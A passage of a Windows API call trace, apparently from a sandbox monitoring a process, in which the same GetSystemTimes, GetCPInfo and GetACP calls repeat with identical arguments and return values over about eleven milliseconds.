GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.672] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.672] GetACP () returned 0x4e4 [0130.672] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.672] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.672] GetACP () returned 0x4e4 [0130.672] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.672] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.672] GetACP () returned 0x4e4 [0130.672] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.673] GetACP () returned 0x4e4 [0130.673] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.673] GetACP () returned 0x4e4 [0130.673] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.673] GetACP () returned 0x4e4 [0130.673] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.673] GetACP () returned 0x4e4 [0130.673] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.673] GetACP () returned 0x4e4 [0130.673] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.673] GetACP () returned 0x4e4 [0130.673] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.673] GetACP () returned 0x4e4 [0130.673] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.674] GetACP () returned 0x4e4 [0130.674] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.674] GetACP () returned 0x4e4 [0130.674] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.674] GetACP () returned 0x4e4 [0130.674] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.674] GetACP () returned 0x4e4 [0130.674] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.674] GetACP () returned 0x4e4 [0130.674] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.674] GetACP () returned 0x4e4 [0130.674] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.675] GetACP () returned 0x4e4 [0130.675] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.675] GetACP () returned 0x4e4 [0130.675] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.675] GetACP () returned 0x4e4 [0130.675] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.675] GetACP () returned 0x4e4 [0130.675] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.675] GetACP () returned 0x4e4 [0130.675] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.675] GetACP () returned 0x4e4 [0130.675] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.675] GetACP () returned 0x4e4 [0130.675] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.676] GetACP () returned 0x4e4 [0130.676] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.676] GetACP () returned 0x4e4 [0130.676] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.676] GetACP () returned 0x4e4 [0130.676] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.676] GetACP () returned 0x4e4 [0130.676] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.676] GetACP () returned 0x4e4 [0130.676] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.676] GetACP () returned 0x4e4 [0130.676] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.676] GetACP () returned 0x4e4 [0130.676] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.677] GetACP () returned 0x4e4 [0130.677] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.677] GetACP () returned 0x4e4 [0130.677] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.677] GetACP () returned 0x4e4 [0130.677] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.677] GetACP () returned 0x4e4 [0130.677] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.677] GetACP () returned 0x4e4 [0130.677] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.677] GetACP () returned 0x4e4 [0130.677] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.678] GetACP () returned 0x4e4 [0130.678] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.678] GetACP () returned 0x4e4 [0130.678] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.678] GetACP () returned 0x4e4 [0130.678] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.678] GetACP () returned 0x4e4 [0130.678] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.678] GetACP () returned 0x4e4 [0130.678] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.678] GetACP () returned 0x4e4 [0130.678] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.678] GetACP () returned 0x4e4 [0130.678] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.679] GetACP () returned 0x4e4 [0130.679] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.679] GetACP () returned 0x4e4 [0130.679] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.679] GetACP () returned 0x4e4 [0130.679] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.679] GetACP () returned 0x4e4 [0130.679] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.679] GetACP () returned 0x4e4 [0130.679] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.679] GetACP () returned 0x4e4 [0130.679] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.679] GetACP () returned 0x4e4 [0130.679] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.680] GetACP () returned 0x4e4 [0130.680] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.680] GetACP () returned 0x4e4 [0130.680] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.680] GetACP () returned 0x4e4 [0130.680] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.680] GetACP () returned 0x4e4 [0130.680] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.680] GetACP () returned 0x4e4 [0130.680] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.680] GetACP () returned 0x4e4 [0130.680] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.680] GetACP () returned 0x4e4 [0130.681] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.681] GetACP () returned 0x4e4 [0130.681] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.681] GetACP () returned 0x4e4 [0130.681] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.681] GetACP () returned 0x4e4 [0130.681] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.681] GetACP () returned 0x4e4 [0130.681] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.681] GetACP () returned 0x4e4 [0130.681] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.681] GetACP () returned 0x4e4 [0130.681] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.681] GetACP () returned 0x4e4 [0130.682] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.682] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.682] GetACP () returned 0x4e4 [0130.682] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.682] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.682] GetACP () returned 0x4e4 [0130.682] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.682] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.682] GetACP () returned 0x4e4 [0130.682] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.682] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.682] GetACP () returned 0x4e4 [0130.682] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.682] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.682] GetACP () returned 0x4e4 [0130.682] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.682] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.682] GetACP () returned 0x4e4 [0130.682] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.683] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.683] GetACP () returned 0x4e4 [0130.683] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.683] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.683] GetACP () returned 0x4e4 [0130.683] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.683] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.683] GetACP () returned 0x4e4 [0130.683] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.683] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.683] GetACP () returned 0x4e4 [0130.683] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.683] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.683] GetACP () returned 0x4e4 [0130.683] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.683] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.683] GetACP () returned 0x4e4 [0130.683] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) 